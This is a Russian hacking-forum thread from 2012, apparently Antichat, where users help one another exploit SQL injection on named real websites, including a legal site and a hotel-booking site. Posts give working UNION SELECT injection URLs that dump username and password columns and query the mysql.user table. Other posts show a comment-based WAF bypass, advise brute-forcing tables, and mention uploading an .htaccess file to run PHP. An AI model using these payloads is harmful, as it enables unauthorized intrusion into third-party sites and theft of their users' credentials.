11.05.2012, 22:54
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от Cennarios
А: Если конфигурация сервера позволяет переопределять правила .htaccess в дочерних директориях, тогда залив в соответствующую папку .htaccess с правилами низводящими вышестоящие корневые и позволяющие обратиться к файлу с php кодом как к файлу а не контроллеру - то будет тебе профит.
а я читал про, про .htaccess, но чёт там не ввидел как сделать чтобы сделать то о чём вы говорите, если подскажите что в нём нужно прописать и дадите ссыль но ПОЛНЫЙ мунал по .htaccess буду очень презнателен
|
|
|
11.05.2012, 23:21
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
С нами:
9384053
Репутация:
303
|
|
Сообщение от qaz
а я читал про, про .htaccess, но чёт там не ввидел как сделать чтобы сделать то о чём вы говорите, если подскажите что в нём нужно прописать и дадите ссыль но ПОЛНЫЙ мунал по .htaccess буду очень презнателен
На неделе, как будет время оформлю пост на эту тему. Сейчас ,к сожалению, проблема с временем.
|
|
|
|
12.05.2012, 14:19
|
|
Новичок
Регистрация: 09.04.2009
Сообщений: 8
С нами:
8994048
Репутация:
0
|
|
Не могу раскрутить.... Мнения типа "читай мануал" и т.д. оставьте при себе и пройдите мимо!
Код:
http://www.tranleint.com/tranleint/index.php?option=com_order&id=-13+union+(select+1,host,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28)+from+(0x6D7973716C2E75736572)+limit+0,1--
http://www.tranleint.com/tranleint/index.php?option=com_order&id=-13+union+(select+1,id,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28)+from+mamb_users+limit+0,1--
http://www.tranleint.com/tranleint/index.php?option=com_order&id=-13+union+(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28)--
|
|
|
|
12.05.2012, 14:23
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от cipa21
Не могу раскрутить.... Мнения типа "читай мануал" и т.д. оставьте при себе и пройдите мимо!
Код:
http://www.tranleint.com/tranleint/index.php?option=com_order&id=-13+union+(select+1,host,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28)+from+(0x6D7973716C2E75736572)+limit+0,1--
http://www.tranleint.com/tranleint/index.php?option=com_order&id=-13+union+(select+1,id,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28)+from+mamb_users+limit+0,1--
http://www.tranleint.com/tranleint/index.php?option=com_order&id=-13+union+(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28)--
http://www.tranleint.com/tranleint/index.php?option=com_order&id=-13+union+(select+1,concat_ws(0x3a,username,passwor d),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26,27,28+from+tli_users)--+
читай мануал
|
|
|
|
12.05.2012, 14:25
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
cipa21,
я не хочу говорить "читай мануал", но "читай мануал".
Смотри:
from+(0x6D7973716C2E75736572)
Такое только в кошмарах приснится, нельзя тут хекс юзать.
И вообще там WAF стоит, обходится так:
Код:
http://www.tranleint.com/tranleint/index.php?option=com_order&id=-13+union+/*!select*/+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--+f
Версия 5.1.56
|
|
|
|
13.05.2012, 17:10
|
|
Новичок
Регистрация: 09.04.2009
Сообщений: 8
С нами:
8994048
Репутация:
0
|
|
И снова я... Здрасьти...
Код:
http://www.chnlawyer.org/index.php?option=com_ask&task=ask&act=view&ID=21&menuid=1+union+select+@@version
information_schema не доступен. Брут таблиц результата не дал. Есть предложения? |
|
|
|
13.05.2012, 21:58
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами:
8814194
Репутация:
0
|
|
У вас 4ая версия Mysql. В ней еще не было Information_schema! Здесь только вариант брута!
|
|
|
|
14.05.2012, 12:40
|
|
Познающий
Регистрация: 03.05.2011
Сообщений: 30
С нами:
7909526
Репутация:
1
|
|
http://hotel-booking-russia.com/catalog-hotel.shtml?id=11%20and%201=2%20union%20select%201 ,2,3,4,COLUMN_NAME,6,7,COLUMN_NAME%20from%20INFORM ATION_SCHEMA.COLUMNS%20Where%20table_name=%27test_ customers%27%20limit%202,1 не могу найти админа.
|
|
|
|
14.05.2012, 13:24
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами:
8814194
Репутация:
0
|
|
to ReV0LVeR
Код:
http://hotel-booking-russia[dot]com/catalog-hotel.shtml?id=-11+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,uid,login,password,level)+from+test_user+limit+0,1#
Ищите здесь админа, там несколько уровней у пользователей, я не смотрел кто там именно админ! |
|
|
|
14.05.2012, 13:40
|
|
Познающий
Регистрация: 03.05.2011
Сообщений: 30
С нами:
7909526
Репутация:
1
|
|
hash вида mysql
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
